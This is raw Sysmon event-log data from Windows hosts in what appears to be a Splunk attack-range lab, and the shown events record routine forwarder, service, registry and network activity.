11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289e-0xd5c81fd9) 13241300x8000000000000000297975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a7-0x378c87d9) 13241300x8000000000000000297974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828af-0x9950efd9) 23542300x8000000000000000297973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:26.062{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA7333C009AA8BA9AD4D464335FD697,SHA256=E7BB0A84A7CEF91D8E8571116000B3593119B3C30E711FC7C24A902590C427C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:27.680{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16AD16B1AFFEE744F24182B027C36C48,SHA256=76D97CB72D36A723CB728807D1553F2FEDF9AD14A36813B003F0FCB5ECC8C256,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:27.099{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104D51CDA7318B2D27108BCBBC5FB8AF,SHA256=8324524E4391546473A7206DBE7E91531B28D8256D2B2F137153ADF8A446DBC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:24.705{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49497-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:28.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=224FBB58E8454001F8D25E085EBCDC1D,SHA256=70CBDC984C916411F9444BB4C81CFCF61D3451BD1F8BA02789099C6B9C2F5091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:28.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D080AD6C5E4EF3FD80DC87946F88BD45,SHA256=2DB9C939E0006D8AFA3BF06A160CA7484F85E84C8496AF0235A20499D33F7A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:28.711{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C71108E8C0B1BD7668AAA09C2D610C,SHA256=FEBCB1CB1133A1ED7F1A850F86F29E78614C8C054E4CA0AF10EBC6073F1ADC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:28.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D98B0FE9C5D1BED8F35F761610F92A,SHA256=68ACF66AE378ACE53E770B0F819B82CFE0B23BB1A3851DDF2817AF0B5C68C905,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:29.789{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC2D40F3B24A0C8C921740979B45CBA,SHA256=49B9ED823113D4DABA59D588C61E295A0E8DAA3CB3D8C9CB718373B7426B5515,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:29.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7072F4BB26664BFA17E3A687D521402A,SHA256=6762A43DB2DEFC253C5397A4EFE6FDB2E7805D942932705C57C7DECC31056290,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:26.554{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51678-false10.0.1.12-8000- 354300x8000000000000000221830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:26.461{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-51455-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000221834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:30.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0300009A77C68E6B38C5E8B466C07DA3,SHA256=FD47D4E2E49A571B483FD53CB59DDD63A8902BCD9A562DADC8A20A328CDE0405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:30.477{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=EFD72C89269F934D4A43F5C13788634B,SHA256=213FA2020DC80BAB3856B4EF0CD6D325317D63D00236DF4886EF3824ACA515A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:30.150{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41B70F669B879BE8C3B04106404EDA2F,SHA256=6E5E721D9E38C34F16C8EC36E71228275136F777C93859636F85A42FBA243096,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:31.165{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3394C7669EC795DD6A63D2527E1735AF,SHA256=F099D9EC3DDE1859193FC184A7F6C777E90FF690B53FEC4A18D869F9B1DCF6F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:32.742{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:32.742{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:32.742{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:32.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C584E44ACF0D3394FE8BA4C1E27F044E,SHA256=49C27E40B63B6B99D7019A21AA873BB9ED81D56D550B864DFE9CE78C5BD76A9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:32.180{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A5B1E54EC74C48EF1A5501955C558FF,SHA256=4D39317B891A32FD9C3D52430598BF24E4C543758C0B479AED83F2C6E4BBAD7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:33.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D12877C1881555C51FFBD16BF95813A9,SHA256=161D52AC7539730D254F2D1A6D5C1D9C08E0381389291FDAF54E3337140B7E6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:33.596{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=32B477F203449F4BDBBDF5902B13AA55,SHA256=0F77ADC72BE2ECCD9221D9829DA4C02459183024696993430295BFF5894C0212,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:30.707{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49498-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:33.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71CFD87625F2EE4B7BC46C312E0BFC76,SHA256=1B07324C833C881DD0F5ADF3BFE956F8054FB5D53F37106673F7530AF6836AA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:34.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDDF92A349B01F14D94659A8E40EC466,SHA256=BDD39FD54FD60C43B0E64D40F530ADAA7D84A158C2A83DF299E85AEAD9DD8B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:34.258{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3A10F19A45B70DD68869F82694ABD8,SHA256=600D51A085F25B919EB7F08F17C6435E1493C88C377C87D84916487863C83200,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:32.539{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51679-false10.0.1.12-8000- 23542300x8000000000000000221841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:35.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD232FDCF951ED7DF82460AB66AF4BA9,SHA256=B802AFB221028BDED07AF5063A4FA66CD18246EAE8949F9414C52141B7F0702B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:35.215{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D33AF41ED4CE27A09BC86BC23635841D,SHA256=40C1ED3A4B7E1CF1185A15FBEC08B1AD17D5776BD1D06CDDFEE591043538298B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:36.508{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D169B2E9D5BA31C6A9DB9424E1F41C54,SHA256=29EFABAE83F7AFD08EC8E10FE4A0E3F6BCC4318863F5FEFC17553BA2034C3F8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:36.215{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10DD3A9BA1CD088A1259C837290E92A1,SHA256=B227A929E32A13B8C2265220D7F70B3BD83291548118EBAFA39E3A09D75A55D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:37.742{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D336DA8A53D357615C579A686080F057,SHA256=FF93C53D65EA0D839AD51C66AA5B2AE98D442FDD345CCEEB7E5A14DC461CA25D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:37.246{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26C14495E1E6A008E083B27D7BB3CDDB,SHA256=6C6B69B21E105ED0E1F001EE02DE33797A5FF02668C3E2B4580CA972208505FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:38.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8428B33AE2A961D1DE13B47D9F9D401C,SHA256=9BB33ADC4FC53D6451F4AD96646A3640E92531025DD645DFB6E94FA29EE5B82E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:38.277{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73364771FBC1367CE8DDF4EE5CFA80A2,SHA256=EE41FED0EE9BE387EB6FB7BB0381DE3BB97C2C977D19575ADED080E76C0274B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:36.519{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49499-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:39.852{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BC02C801596107BA2DEBD2FFABB3960,SHA256=C829AFD537F0C01E40616F5A846693CF6AF8AF82D04FDEEA1E9FC28C8B90C946,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:39.297{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51BDB1A9CFCFC07D18D31F18AE68F47C,SHA256=C6B8B9F3BBB93A00DE3C174B92D44A99116951473DE920E25FD25FAB9EC3E59A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:36.819{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local62066- 354300x8000000000000000221847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:37.633{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51680-false10.0.1.12-8000- 23542300x8000000000000000298004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:40.529{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:40.329{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4682882631248DBAA933DBB478DC68DF,SHA256=D3381C85C5CCF845D2005F9E3671D488FE4438CF8185C8524F8317B2A8D24C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:41.088{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0476A17B8EA4D1949FAEE0A3C8357F90,SHA256=99CD5F2915BD0EBD8B579A443E25EAD5DBB7B52DD636B29CFBBA29F7B9190DDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:41.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86134A72DBB90B4130B124909AD2B513,SHA256=4374298F61B1B25A09F90ACF3BC3808354A5FF44D84D0670BE00F3B4E5D0E35D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:41.044{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-162MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:42.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 